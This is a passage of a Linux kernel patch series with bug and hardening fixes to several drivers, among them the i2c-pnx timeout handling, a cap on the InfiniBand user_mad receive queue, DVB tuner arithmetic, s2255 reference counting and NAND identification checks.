+ /* Scan the system ROM for the signature "FJKEYINF" */
+ static __init const void __iomem *bios_signature(const void __iomem *bios)
+diff --git a/drivers/i2c/busses/i2c-pnx.c b/drivers/i2c/busses/i2c-pnx.c
+index 50f21cdbe90d3..d2c09b0fdf527 100644
+--- a/drivers/i2c/busses/i2c-pnx.c
++++ b/drivers/i2c/busses/i2c-pnx.c
+@@ -15,7 +15,6 @@
+ #include <linux/ioport.h>
+ #include <linux/delay.h>
+ #include <linux/i2c.h>
+-#include <linux/timer.h>
+ #include <linux/completion.h>
+ #include <linux/platform_device.h>
+ #include <linux/io.h>
+@@ -32,7 +31,6 @@ struct i2c_pnx_mif {
+ 	int			ret;		/* Return value */
+ 	int			mode;		/* Interface mode */
+ 	struct completion	complete;	/* I/O completion */
+-	struct timer_list	timer;		/* Timeout */
+ 	u8 *			buf;		/* Data buffer */
+ 	int			len;		/* Length of data buffer */
+ 	int			order;		/* RX Bytes to order via TX */
+@@ -117,24 +115,6 @@ static inline int wait_reset(struct i2c_pnx_algo_data *data)
+ 	return (timeout <= 0);
+ }
+ 
+-static inline void i2c_pnx_arm_timer(struct i2c_pnx_algo_data *alg_data)
+-{
+-	struct timer_list *timer = &alg_data->mif.timer;
+-	unsigned long expires = msecs_to_jiffies(alg_data->timeout);
+-
+-	if (expires <= 1)
+-		expires = 2;
+-
+-	del_timer_sync(timer);
+-
+-	dev_dbg(&alg_data->adapter.dev, "Timer armed at %lu plus %lu jiffies.\n",
+-		jiffies, expires);
+-
+-	timer->expires = jiffies + expires;
+-
+-	add_timer(timer);
+-}
+-
+ /**
+  * i2c_pnx_start - start a device
+  * @slave_addr:		slave address
+@@ -259,8 +239,6 @@ static int i2c_pnx_master_xmit(struct i2c_pnx_algo_data *alg_data)
+ 				~(mcntrl_afie | mcntrl_naie | mcntrl_drmie),
+ 				  I2C_REG_CTL(alg_data));
+ 
+-			del_timer_sync(&alg_data->mif.timer);
+-
+ 			dev_dbg(&alg_data->adapter.dev,
+ 				"%s(): Waking up xfer routine.\n",
+ 				__func__);
+@@ -276,8 +254,6 @@ static int i2c_pnx_master_xmit(struct i2c_pnx_algo_data *alg_data)
+ 			~(mcntrl_afie | mcntrl_naie | mcntrl_drmie),
+ 			  I2C_REG_CTL(alg_data));
+ 
+-		/* Stop timer. */
+-		del_timer_sync(&alg_data->mif.timer);
+ 		dev_dbg(&alg_data->adapter.dev,
+ 			"%s(): Waking up xfer routine after zero-xfer.\n",
+ 			__func__);
+@@ -364,8 +340,6 @@ static int i2c_pnx_master_rcv(struct i2c_pnx_algo_data *alg_data)
+ 				 mcntrl_drmie | mcntrl_daie);
+ 			iowrite32(ctl, I2C_REG_CTL(alg_data));
+ 
+-			/* Kill timer. */
+-			del_timer_sync(&alg_data->mif.timer);
+ 			complete(&alg_data->mif.complete);
+ 		}
+ 	}
+@@ -400,8 +374,6 @@ static irqreturn_t i2c_pnx_interrupt(int irq, void *dev_id)
+ 			 mcntrl_drmie);
+ 		iowrite32(ctl, I2C_REG_CTL(alg_data));
+ 
+-		/* Stop timer, to prevent timeout. */
+-		del_timer_sync(&alg_data->mif.timer);
+ 		complete(&alg_data->mif.complete);
+ 	} else if (stat & mstatus_nai) {
+ 		/* Slave did not acknowledge, generate a STOP */
+@@ -419,8 +391,6 @@ static irqreturn_t i2c_pnx_interrupt(int irq, void *dev_id)
+ 		/* Our return value. */
+ 		alg_data->mif.ret = -EIO;
+ 
+-		/* Stop timer, to prevent timeout. */
+-		del_timer_sync(&alg_data->mif.timer);
+ 		complete(&alg_data->mif.complete);
+ 	} else {
+ 		/*
+@@ -453,9 +423,8 @@ static irqreturn_t i2c_pnx_interrupt(int irq, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
+-static void i2c_pnx_timeout(struct timer_list *t)
++static void i2c_pnx_timeout(struct i2c_pnx_algo_data *alg_data)
+ {
+-	struct i2c_pnx_algo_data *alg_data = from_timer(alg_data, t, mif.timer);
+ 	u32 ctl;
+ 
+ 	dev_err(&alg_data->adapter.dev,
+@@ -472,7 +441,6 @@ static void i2c_pnx_timeout(struct timer_list *t)
+ 	iowrite32(ctl, I2C_REG_CTL(alg_data));
+ 	wait_reset(alg_data);
+ 	alg_data->mif.ret = -EIO;
+-	complete(&alg_data->mif.complete);
+ }
+ 
+ static inline void bus_reset_if_active(struct i2c_pnx_algo_data *alg_data)
+@@ -514,6 +482,7 @@ i2c_pnx_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 	struct i2c_msg *pmsg;
+ 	int rc = 0, completed = 0, i;
+ 	struct i2c_pnx_algo_data *alg_data = adap->algo_data;
++	unsigned long time_left;
+ 	u32 stat;
+ 
+ 	dev_dbg(&alg_data->adapter.dev,
+@@ -548,7 +517,6 @@ i2c_pnx_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 		dev_dbg(&alg_data->adapter.dev, "%s(): mode %d, %d bytes\n",
+ 			__func__, alg_data->mif.mode, alg_data->mif.len);
+ 
+-		i2c_pnx_arm_timer(alg_data);
+ 
+ 		/* initialize the completion var */
+ 		init_completion(&alg_data->mif.complete);
+@@ -564,7 +532,10 @@ i2c_pnx_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 			break;
+ 
+ 		/* Wait for completion */
+-		wait_for_completion(&alg_data->mif.complete);
++		time_left = wait_for_completion_timeout(&alg_data->mif.complete,
++							alg_data->timeout);
++		if (time_left == 0)
++			i2c_pnx_timeout(alg_data);
+ 
+ 		if (!(rc = alg_data->mif.ret))
+ 			completed++;
+@@ -657,7 +628,10 @@ static int i2c_pnx_probe(struct platform_device *pdev)
+ 	alg_data->adapter.algo_data = alg_data;
+ 	alg_data->adapter.nr = pdev->id;
+ 
+-	alg_data->timeout = I2C_PNX_TIMEOUT_DEFAULT;
++	alg_data->timeout = msecs_to_jiffies(I2C_PNX_TIMEOUT_DEFAULT);
++	if (alg_data->timeout <= 1)
++		alg_data->timeout = 2;
++
+ #ifdef CONFIG_OF
+ 	alg_data->adapter.dev.of_node = of_node_get(pdev->dev.of_node);
+ 	if (pdev->dev.of_node) {
+@@ -677,8 +651,6 @@ static int i2c_pnx_probe(struct platform_device *pdev)
+ 	if (IS_ERR(alg_data->clk))
+ 		return PTR_ERR(alg_data->clk);
+ 
+-	timer_setup(&alg_data->mif.timer, i2c_pnx_timeout, 0);
+-
+ 	snprintf(alg_data->adapter.name, sizeof(alg_data->adapter.name),
+ 		 "%s", pdev->name);
+ 
+diff --git a/drivers/infiniband/core/user_mad.c b/drivers/infiniband/core/user_mad.c
+index 5c284dfbe6923..66a0c5a73b832 100644
+--- a/drivers/infiniband/core/user_mad.c
++++ b/drivers/infiniband/core/user_mad.c
+@@ -63,6 +63,8 @@ MODULE_AUTHOR("Roland Dreier");
+ MODULE_DESCRIPTION("InfiniBand userspace MAD packet access");
+ MODULE_LICENSE("Dual BSD/GPL");
+ 
++#define MAX_UMAD_RECV_LIST_SIZE 200000
++
+ enum {
+ 	IB_UMAD_MAX_PORTS  = RDMA_MAX_PORTS,
+ 	IB_UMAD_MAX_AGENTS = 32,
+@@ -113,6 +115,7 @@ struct ib_umad_file {
+ 	struct mutex		mutex;
+ 	struct ib_umad_port    *port;
+ 	struct list_head	recv_list;
++	atomic_t		recv_list_size;
+ 	struct list_head	send_list;
+ 	struct list_head	port_list;
+ 	spinlock_t		send_lock;
+@@ -180,24 +183,28 @@ static struct ib_mad_agent *__get_agent(struct ib_umad_file *file, int id)
+ 	return file->agents_dead ? NULL : file->agent[id];
+ }
+ 
+-static int queue_packet(struct ib_umad_file *file,
+-			struct ib_mad_agent *agent,
+-			struct ib_umad_packet *packet)
++static int queue_packet(struct ib_umad_file *file, struct ib_mad_agent *agent,
++			struct ib_umad_packet *packet, bool is_recv_mad)
+ {
+ 	int ret = 1;
+ 
+ 	mutex_lock(&file->mutex);
+ 
++	if (is_recv_mad &&
++	    atomic_read(&file->recv_list_size) > MAX_UMAD_RECV_LIST_SIZE)
++		goto unlock;
++
+ 	for (packet->mad.hdr.id = 0;
+ 	     packet->mad.hdr.id < IB_UMAD_MAX_AGENTS;
+ 	     packet->mad.hdr.id++)
+ 		if (agent == __get_agent(file, packet->mad.hdr.id)) {
+ 			list_add_tail(&packet->list, &file->recv_list);
++			atomic_inc(&file->recv_list_size);
+ 			wake_up_interruptible(&file->recv_wait);
+ 			ret = 0;
+ 			break;
+ 		}
+-
++unlock:
+ 	mutex_unlock(&file->mutex);
+ 
+ 	return ret;
+@@ -224,7 +231,7 @@ static void send_handler(struct ib_mad_agent *agent,
+ 	if (send_wc->status == IB_WC_RESP_TIMEOUT_ERR) {
+ 		packet->length = IB_MGMT_MAD_HDR;
+ 		packet->mad.hdr.status = ETIMEDOUT;
+-		if (!queue_packet(file, agent, packet))
++		if (!queue_packet(file, agent, packet, false))
+ 			return;
+ 	}
+ 	kfree(packet);
+@@ -284,7 +291,7 @@ static void recv_handler(struct ib_mad_agent *agent,
+ 		rdma_destroy_ah_attr(&ah_attr);
+ 	}
+ 
+-	if (queue_packet(file, agent, packet))
++	if (queue_packet(file, agent, packet, true))
+ 		goto err2;
+ 	return;
+ 
+@@ -409,6 +416,7 @@ static ssize_t ib_umad_read(struct file *filp, char __user *buf,
+ 
+ 	packet = list_entry(file->recv_list.next, struct ib_umad_packet, list);
+ 	list_del(&packet->list);
++	atomic_dec(&file->recv_list_size);
+ 
+ 	mutex_unlock(&file->mutex);
+ 
+@@ -421,6 +429,7 @@ static ssize_t ib_umad_read(struct file *filp, char __user *buf,
+ 		/* Requeue packet */
+ 		mutex_lock(&file->mutex);
+ 		list_add(&packet->list, &file->recv_list);
++		atomic_inc(&file->recv_list_size);
+ 		mutex_unlock(&file->mutex);
+ 	} else {
+ 		if (packet->recv_wc)
+diff --git a/drivers/input/ff-core.c b/drivers/input/ff-core.c
+index 16231fe080b00..609a5f01761bd 100644
+--- a/drivers/input/ff-core.c
++++ b/drivers/input/ff-core.c
+@@ -9,8 +9,10 @@
+ /* #define DEBUG */
+ 
+ #include <linux/input.h>
++#include <linux/limits.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
++#include <linux/overflow.h>
+ #include <linux/sched.h>
+ #include <linux/slab.h>
+ 
+@@ -315,9 +317,8 @@ int input_ff_create(struct input_dev *dev, unsigned int max_effects)
+ 		return -EINVAL;
+ 	}
+ 
+-	ff_dev_size = sizeof(struct ff_device) +
+-				max_effects * sizeof(struct file *);
+-	if (ff_dev_size < max_effects) /* overflow */
++	ff_dev_size = struct_size(ff, effect_owners, max_effects);
++	if (ff_dev_size == SIZE_MAX) /* overflow */
+ 		return -EINVAL;
+ 
+ 	ff = kzalloc(ff_dev_size, GFP_KERNEL);
+diff --git a/drivers/media/dvb-frontends/as102_fe_types.h b/drivers/media/dvb-frontends/as102_fe_types.h
+index 297f9520ebf9d..8a4e392c88965 100644
+--- a/drivers/media/dvb-frontends/as102_fe_types.h
++++ b/drivers/media/dvb-frontends/as102_fe_types.h
+@@ -174,6 +174,6 @@ struct as10x_register_addr {
+ 	uint32_t addr;
+ 	/* register mode access */
+ 	uint8_t mode;
+-};
++} __packed;
+ 
+ #endif
+diff --git a/drivers/media/dvb-frontends/tda10048.c b/drivers/media/dvb-frontends/tda10048.c
+index f6d8a64762b99..907e786c5e10b 100644
+--- a/drivers/media/dvb-frontends/tda10048.c
++++ b/drivers/media/dvb-frontends/tda10048.c
+@@ -410,6 +410,7 @@ static int tda10048_set_if(struct dvb_frontend *fe, u32 bw)
+ 	struct tda10048_config *config = &state->config;
+ 	int i;
+ 	u32 if_freq_khz;
++	u64 sample_freq;
+ 
+ 	dprintk(1, "%s(bw = %d)\n", __func__, bw);
+ 
+@@ -451,9 +452,11 @@ static int tda10048_set_if(struct dvb_frontend *fe, u32 bw)
+ 	dprintk(1, "- pll_pfactor = %d\n", state->pll_pfactor);
+ 
+ 	/* Calculate the sample frequency */
+-	state->sample_freq = state->xtal_hz * (state->pll_mfactor + 45);
+-	state->sample_freq /= (state->pll_nfactor + 1);
+-	state->sample_freq /= (state->pll_pfactor + 4);
++	sample_freq = state->xtal_hz;
++	sample_freq *= state->pll_mfactor + 45;
++	do_div(sample_freq, state->pll_nfactor + 1);
++	do_div(sample_freq, state->pll_pfactor + 4);
++	state->sample_freq = sample_freq;
+ 	dprintk(1, "- sample_freq = %d\n", state->sample_freq);
+ 
+ 	/* Update the I/F */
+diff --git a/drivers/media/dvb-frontends/tda18271c2dd.c b/drivers/media/dvb-frontends/tda18271c2dd.c
+index a348344879433..fd928787207ed 100644
+--- a/drivers/media/dvb-frontends/tda18271c2dd.c
++++ b/drivers/media/dvb-frontends/tda18271c2dd.c
+@@ -328,7 +328,7 @@ static int CalcMainPLL(struct tda_state *state, u32 freq)
+ 
+ 	OscFreq = (u64) freq * (u64) Div;
+ 	OscFreq *= (u64) 16384;
+-	do_div(OscFreq, (u64)16000000);
++	do_div(OscFreq, 16000000);
+ 	MainDiv = OscFreq;
+ 
+ 	state->m_Regs[MPD] = PostDiv & 0x77;
+@@ -352,7 +352,7 @@ static int CalcCalPLL(struct tda_state *state, u32 freq)
+ 	OscFreq = (u64)freq * (u64)Div;
+ 	/* CalDiv = u32( OscFreq * 16384 / 16000000 ); */
+ 	OscFreq *= (u64)16384;
+-	do_div(OscFreq, (u64)16000000);
++	do_div(OscFreq, 16000000);
+ 	CalDiv = OscFreq;
+ 
+ 	state->m_Regs[CPD] = PostDiv;
+diff --git a/drivers/media/usb/dvb-usb/dib0700_devices.c b/drivers/media/usb/dvb-usb/dib0700_devices.c
+index 7f8bebfa3e8e9..3d14aba7a0dea 100644
+--- a/drivers/media/usb/dvb-usb/dib0700_devices.c
++++ b/drivers/media/usb/dvb-usb/dib0700_devices.c
+@@ -2419,7 +2419,12 @@ static int stk9090m_frontend_attach(struct dvb_usb_adapter *adap)
+ 
+ 	adap->fe_adap[0].fe = dvb_attach(dib9000_attach, &adap->dev->i2c_adap, 0x80, &stk9090m_config);
+ 
+-	return adap->fe_adap[0].fe == NULL ?  -ENODEV : 0;
++	if (!adap->fe_adap[0].fe) {
++		release_firmware(state->frontend_firmware);
++		return -ENODEV;
++	}
++
++	return 0;
+ }
+ 
+ static int dib9090_tuner_attach(struct dvb_usb_adapter *adap)
+@@ -2492,8 +2497,10 @@ static int nim9090md_frontend_attach(struct dvb_usb_adapter *adap)
+ 	dib9000_i2c_enumeration(&adap->dev->i2c_adap, 1, 0x20, 0x80);
+ 	adap->fe_adap[0].fe = dvb_attach(dib9000_attach, &adap->dev->i2c_adap, 0x80, &nim9090md_config[0]);
+ 
+-	if (adap->fe_adap[0].fe == NULL)
++	if (!adap->fe_adap[0].fe) {
++		release_firmware(state->frontend_firmware);
+ 		return -ENODEV;
++	}
+ 
+ 	i2c = dib9000_get_i2c_master(adap->fe_adap[0].fe, DIBX000_I2C_INTERFACE_GPIO_3_4, 0);
+ 	dib9000_i2c_enumeration(i2c, 1, 0x12, 0x82);
+@@ -2501,7 +2508,12 @@ static int nim9090md_frontend_attach(struct dvb_usb_adapter *adap)
+ 	fe_slave = dvb_attach(dib9000_attach, i2c, 0x82, &nim9090md_config[1]);
+ 	dib9000_set_slave_frontend(adap->fe_adap[0].fe, fe_slave);
+ 
+-	return fe_slave == NULL ?  -ENODEV : 0;
++	if (!fe_slave) {
++		release_firmware(state->frontend_firmware);
++		return -ENODEV;
++	}
++
++	return 0;
+ }
+ 
+ static int nim9090md_tuner_attach(struct dvb_usb_adapter *adap)
+diff --git a/drivers/media/usb/dvb-usb/dw2102.c b/drivers/media/usb/dvb-usb/dw2102.c
+index 356fc728d59a8..5ff08dd04b5b3 100644
+--- a/drivers/media/usb/dvb-usb/dw2102.c
++++ b/drivers/media/usb/dvb-usb/dw2102.c
+@@ -716,6 +716,7 @@ static int su3000_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ {
+ 	struct dvb_usb_device *d = i2c_get_adapdata(adap);
+ 	struct dw2102_state *state;
++	int j;
+ 
+ 	if (!d)
+ 		return -ENODEV;
+@@ -729,11 +730,11 @@ static int su3000_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 		return -EAGAIN;
+ 	}
+ 
+-	switch (num) {
+-	case 1:
+-		switch (msg[0].addr) {
++	j = 0;
++	while (j < num) {
++		switch (msg[j].addr) {
+ 		case SU3000_STREAM_CTRL:
+-			state->data[0] = msg[0].buf[0] + 0x36;
++			state->data[0] = msg[j].buf[0] + 0x36;
+ 			state->data[1] = 3;
+ 			state->data[2] = 0;
+ 			if (dvb_usb_generic_rw(d, state->data, 3,
+@@ -745,61 +746,86 @@ static int su3000_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			if (dvb_usb_generic_rw(d, state->data, 1,
+ 					state->data, 2, 0) < 0)
+ 				err("i2c transfer failed.");
+-			msg[0].buf[1] = state->data[0];
+-			msg[0].buf[0] = state->data[1];
++			msg[j].buf[1] = state->data[0];
++			msg[j].buf[0] = state->data[1];
+ 			break;
+ 		default:
+-			if (3 + msg[0].len > sizeof(state->data)) {
+-				warn("i2c wr: len=%d is too big!\n",
+-				     msg[0].len);
++			/* if the current write msg is followed by a another
++			 * read msg to/from the same address
++			 */
++			if ((j+1 < num) && (msg[j+1].flags & I2C_M_RD) &&
++			    (msg[j].addr == msg[j+1].addr)) {
++				/* join both i2c msgs to one usb read command */
++				if (4 + msg[j].len > sizeof(state->data)) {
++					warn("i2c combined wr/rd: write len=%d is too big!\n",
++					    msg[j].len);
++					num = -EOPNOTSUPP;
++					break;
++				}
++				if (1 + msg[j+1].len > sizeof(state->data)) {
++					warn("i2c combined wr/rd: read len=%d is too big!\n",
++					    msg[j+1].len);
++					num = -EOPNOTSUPP;
++					break;
++				}
++
++				state->data[0] = 0x09;
++				state->data[1] = msg[j].len;
++				state->data[2] = msg[j+1].len;
++				state->data[3] = msg[j].addr;
++				memcpy(&state->data[4], msg[j].buf, msg[j].len);
++
++				if (dvb_usb_generic_rw(d, state->data, msg[j].len + 4,
++					state->data, msg[j+1].len + 1, 0) < 0)
++					err("i2c transfer failed.");
++
++				memcpy(msg[j+1].buf, &state->data[1], msg[j+1].len);
++				j++;
++				break;
++			}
++
++			if (msg[j].flags & I2C_M_RD) {
++				/* single read */
++				if (4 + msg[j].len > sizeof(state->data)) {
++					warn("i2c rd: len=%d is too big!\n", msg[j].len);
++					num = -EOPNOTSUPP;
++					break;
++				}
++
++				state->data[0] = 0x09;
++				state->data[1] = 0;
++				state->data[2] = msg[j].len;
++				state->data[3] = msg[j].addr;
++				memcpy(&state->data[4], msg[j].buf, msg[j].len);
++
++				if (dvb_usb_generic_rw(d, state->data, 4,
++					state->data, msg[j].len + 1, 0) < 0)
++					err("i2c transfer failed.");
++
++				memcpy(msg[j].buf, &state->data[1], msg[j].len);
++				break;
++			}
++
++			/* single write */
++			if (3 + msg[j].len > sizeof(state->data)) {
++				warn("i2c wr: len=%d is too big!\n", msg[j].len);
+ 				num = -EOPNOTSUPP;
+ 				break;
+ 			}
+ 
+-			/* always i2c write*/
+ 			state->data[0] = 0x08;
+-			state->data[1] = msg[0].addr;
+-			state->data[2] = msg[0].len;
++			state->data[1] = msg[j].addr;
++			state->data[2] = msg[j].len;
+ 
+-			memcpy(&state->data[3], msg[0].buf, msg[0].len);
++			memcpy(&state->data[3], msg[j].buf, msg[j].len);
+ 
+-			if (dvb_usb_generic_rw(d, state->data, msg[0].len + 3,
++			if (dvb_usb_generic_rw(d, state->data, msg[j].len + 3,
+ 						state->data, 1, 0) < 0)
+ 				err("i2c transfer failed.");
++		} // switch
++		j++;
+ 
+-		}
+-		break;
+-	case 2:
+-		/* always i2c read */
+-		if (4 + msg[0].len > sizeof(state->data)) {
+-			warn("i2c rd: len=%d is too big!\n",
+-			     msg[0].len);
+-			num = -EOPNOTSUPP;
+-			break;
+-		}
+-		if (1 + msg[1].len > sizeof(state->data)) {
+-			warn("i2c rd: len=%d is too big!\n",
+-			     msg[1].len);
+-			num = -EOPNOTSUPP;
+-			break;
+-		}
+-
+-		state->data[0] = 0x09;
+-		state->data[1] = msg[0].len;
+-		state->data[2] = msg[1].len;
+-		state->data[3] = msg[0].addr;
+-		memcpy(&state->data[4], msg[0].buf, msg[0].len);
+-
+-		if (dvb_usb_generic_rw(d, state->data, msg[0].len + 4,
+-					state->data, msg[1].len + 1, 0) < 0)
+-			err("i2c transfer failed.");
+-
+-		memcpy(msg[1].buf, &state->data[1], msg[1].len);
+-		break;
+-	default:
+-		warn("more than 2 i2c messages at a time is not handled yet.");
+-		break;
+-	}
++	} // while
+ 	mutex_unlock(&d->data_mutex);
+ 	mutex_unlock(&d->i2c_mutex);
+ 	return num;
+diff --git a/drivers/media/usb/s2255/s2255drv.c b/drivers/media/usb/s2255/s2255drv.c
+index acf18e2251a52..6c9870541c53d 100644
+--- a/drivers/media/usb/s2255/s2255drv.c
++++ b/drivers/media/usb/s2255/s2255drv.c
+@@ -247,7 +247,7 @@ struct s2255_vc {
+ struct s2255_dev {
+ 	struct s2255_vc         vc[MAX_CHANNELS];
+ 	struct v4l2_device      v4l2_dev;
+-	atomic_t                num_channels;
++	refcount_t		num_channels;
+ 	int			frames;
+ 	struct mutex		lock;	/* channels[].vdev.lock */
+ 	struct mutex		cmdlock; /* protects cmdbuf */
+@@ -1550,11 +1550,11 @@ static void s2255_video_device_release(struct video_device *vdev)
+ 		container_of(vdev, struct s2255_vc, vdev);
+ 
+ 	dprintk(dev, 4, "%s, chnls: %d\n", __func__,
+-		atomic_read(&dev->num_channels));
++		refcount_read(&dev->num_channels));
+ 
+ 	v4l2_ctrl_handler_free(&vc->hdl);
+ 
+-	if (atomic_dec_and_test(&dev->num_channels))
++	if (refcount_dec_and_test(&dev->num_channels))
+ 		s2255_destroy(dev);
+ 	return;
+ }
+@@ -1659,7 +1659,7 @@ static int s2255_probe_v4l(struct s2255_dev *dev)
+ 				"failed to register video device!\n");
+ 			break;
+ 		}
+-		atomic_inc(&dev->num_channels);
++		refcount_inc(&dev->num_channels);
+ 		v4l2_info(&dev->v4l2_dev, "V4L2 device registered as %s\n",
+ 			  video_device_node_name(&vc->vdev));
+ 
+@@ -1667,11 +1667,11 @@ static int s2255_probe_v4l(struct s2255_dev *dev)
+ 	pr_info("Sensoray 2255 V4L driver Revision: %s\n",
+ 		S2255_VERSION);
+ 	/* if no channels registered, return error and probe will fail*/
+-	if (atomic_read(&dev->num_channels) == 0) {
++	if (refcount_read(&dev->num_channels) == 0) {
+ 		v4l2_device_unregister(&dev->v4l2_dev);
+ 		return ret;
+ 	}
+-	if (atomic_read(&dev->num_channels) != MAX_CHANNELS)
++	if (refcount_read(&dev->num_channels) != MAX_CHANNELS)
+ 		pr_warn("s2255: Not all channels available.\n");
+ 	return 0;
+ }
+@@ -2220,7 +2220,7 @@ static int s2255_probe(struct usb_interface *interface,
+ 		goto errorFWDATA1;
+ 	}
+ 
+-	atomic_set(&dev->num_channels, 0);
++	refcount_set(&dev->num_channels, 0);
+ 	dev->pid = id->idProduct;
+ 	dev->fw_data = kzalloc(sizeof(struct s2255_fw), GFP_KERNEL);
+ 	if (!dev->fw_data)
+@@ -2340,12 +2340,12 @@ static void s2255_disconnect(struct usb_interface *interface)
+ {
+ 	struct s2255_dev *dev = to_s2255_dev(usb_get_intfdata(interface));
+ 	int i;
+-	int channels = atomic_read(&dev->num_channels);
++	int channels = refcount_read(&dev->num_channels);
+ 	mutex_lock(&dev->lock);
+ 	v4l2_device_disconnect(&dev->v4l2_dev);
+ 	mutex_unlock(&dev->lock);
+ 	/*see comments in the uvc_driver.c usb disconnect function */
+-	atomic_inc(&dev->num_channels);
++	refcount_inc(&dev->num_channels);
+ 	/* unregister each video device. */
+ 	for (i = 0; i < channels; i++)
+ 		video_unregister_device(&dev->vc[i].vdev);
+@@ -2358,7 +2358,7 @@ static void s2255_disconnect(struct usb_interface *interface)
+ 		dev->vc[i].vidstatus_ready = 1;
+ 		wake_up(&dev->vc[i].wait_vidstatus);
+ 	}
+-	if (atomic_dec_and_test(&dev->num_channels))
++	if (refcount_dec_and_test(&dev->num_channels))
+ 		s2255_destroy(dev);
+ 	dev_info(&interface->dev, "%s\n", __func__);
+ }
+diff --git a/drivers/mtd/nand/raw/nand_base.c b/drivers/mtd/nand/raw/nand_base.c
+index c3cc660399255..ea7e37a6e4c07 100644
+--- a/drivers/mtd/nand/raw/nand_base.c
++++ b/drivers/mtd/nand/raw/nand_base.c
+@@ -1090,28 +1090,32 @@ static int nand_fill_column_cycles(struct nand_chip *chip, u8 *addrs,
+ 				   unsigned int offset_in_page)
+ {
+ 	struct mtd_info *mtd = nand_to_mtd(chip);
++	bool ident_stage = !mtd->writesize;
+ 
+-	/* Make sure the offset is less than the actual page size. */
+-	if (offset_in_page > mtd->writesize + mtd->oobsize)
+-		return -EINVAL;
++	/* Bypass all checks during NAND identification */
++	if (likely(!ident_stage)) {
++		/* Make sure the offset is less than the actual page size. */
++		if (offset_in_page > mtd->writesize + mtd->oobsize)
++			return -EINVAL;
+ 
+-	/*
+-	 * On small page NANDs, there's a dedicated command to access the OOB
+-	 * area, and the column address is relative to the start of the OOB
+-	 * area, not the start of the page. Asjust the address accordingly.
+-	 */
+-	if (mtd->writesize <= 512 && offset_in_page >= mtd->writesize)
+-		offset_in_page -= mtd->writesize;
++		/*
++		 * On small page NANDs, there's a dedicated command to access the OOB
++		 * area, and the column address is relative to the start of the OOB
++		 * area, not the start of the page. Asjust the address accordingly.
++		 */
++		if (mtd->writesize <= 512 && offset_in_page >= mtd->writesize)
++			offset_in_page -= mtd->writesize;
+ 
+-	/*
+-	 * The offset in page is expressed in bytes, if the NAND bus is 16-bit
+-	 * wide, then it must be divided by 2.
+-	 */
+-	if (chip->options & NAND_BUSWIDTH_16) {
+-		if (WARN_ON(offset_in_page % 2))
+-			return -EINVAL;
++		/*
++		 * The offset in page is expressed in bytes, if the NAND bus is 16-bit
++		 * wide, then it must be divided by 2.
++		 */
++		if (chip->options & NAND_BUSWIDTH_16) {
++			if (WARN_ON(offset_in_page % 2))
++				return -EINVAL;
+ 
+-		offset_in_page /= 2;
++			offset_in_page /= 2;
++		}
+ 	}
+ 
+ 	addrs[0] = offset_in_page;
+@@ -1120,7 +1124,7 @@ static int nand_fill_column_cycles(struct nand_chip *chip, u8 *addrs,
+ 	 * Small page NANDs use 1 cycle for the columns, while large page NANDs
+ 	 * need 2
+ 	 */
+-	if (mtd->writesize <= 512)
++	if (!ident_stage && mtd->writesize <= 512)
+ 		return 1;
+ 
+ 	addrs[1] = offset_in_page >> 8;
+@@ -1316,16 +1320,19 @@ int nand_change_read_column_op(struct nand_chip *chip,
+ 			       unsigned int len, bool force_8bit)
+ {
+ 	struct mtd_info *mtd = nand_to_mtd(chip);
++	bool ident_stage = !mtd->writesize;
+ 
+ 	if (len && !buf)
+ 		return -EINVAL;
+ 
+-	if (offset_in_page + len > mtd->writesize + mtd->oobsize)
+-		return -EINVAL;
++	if (!ident_stage) {
++		if (offset_in_page + len > mtd->writesize + mtd->oobsize)
++			return -EINVAL;
+ 
+-	/* Small page NANDs do not support column change. */
+-	if (mtd->writesize <= 512)
+-		return -ENOTSUPP;
++		/* Small page NANDs do not support column change. */
++		if (mtd->writesize <= 512)
++			return -ENOTSUPP;
++	}
+ 
+ 	if (nand_has_exec_op(chip)) {
+ 		const struct nand_interface_config *conf =
+@@ -6062,6 +6069,7 @@ static const struct nand_ops rawnand_ops = {
+ static int nand_scan_tail(struct nand_chip *chip)
+ {
+ 	struct mtd_info *mtd = nand_to_mtd(chip);
++	struct nand_device *base = &chip->base;
+ 	struct nand_ecc_ctrl *ecc = &chip->ecc;
+ 	int ret, i;
+ 
+@@ -6206,9 +6214,13 @@ static int nand_scan_tail(struct nand_chip *chip)
+ 	if (!ecc->write_oob_raw)
+ 		ecc->write_oob_raw = ecc->write_oob;
+ 
+-	/* propagate ecc info to mtd_info */
++	/* Propagate ECC info to the generic NAND and MTD layers */
+ 	mtd->ecc_strength = ecc->strength;
++	if (!base->ecc.ctx.conf.strength)
++		base->ecc.ctx.conf.strength = ecc->strength;
+ 	mtd->ecc_step_size = ecc->size;
++	if (!base->ecc.ctx.conf.step_size)
++		base->ecc.ctx.conf.step_size = ecc->size;
+ 
+ 	/*
+ 	 * Set the number of read / write steps for one page depending on ECC
+@@ -6216,6 +6228,8 @@ static int nand_scan_tail(struct nand_chip *chip)
+ 	 */
+ 	if (!ecc->steps)
+ 		ecc->steps = mtd->writesize / ecc->size;
++	if (!base->ecc.ctx.nsteps)
++		base->ecc.ctx.nsteps = ecc->steps;
+ 	if (ecc->steps * ecc->size != mtd->writesize) {
+ 		WARN(1, "Invalid ECC parameters\n");
+ 		ret = -EINVAL;
+diff --git a/drivers/mtd/nand/raw/rockchip-nand-controller.c b/drivers/mtd/nand/raw/rockchip-nand-controller.c
+index c9c4e9ffcae18..d8456b849c13d 100644
+--- a/drivers/mtd/nand/raw/rockchip-nand-controller.c
++++ b/drivers/mtd/nand/raw/rockchip-nand-controller.c
+@@ -421,13 +421,13 @@ static int rk_nfc_setup_interface(struct nand_chip *chip, int target,
+ 	u32 rate, tc2rw, trwpw, trw2c;
+ 	u32 temp;
+ 
+-	if (target < 0)
+-		return 0;
+-
+ 	timings = nand_get_sdr_timings(conf);
+ 	if (IS_ERR(timings))
+ 		return -EOPNOTSUPP;
+ 
++	if (target < 0)
++		return 0;
++
+ 	if (IS_ERR(nfc->nfc_clk))
+ 		rate = clk_get_rate(nfc->ahb_clk);
+ 	else
+diff --git a/drivers/net/bonding/bond_options.c b/drivers/net/bonding/bond_options.c
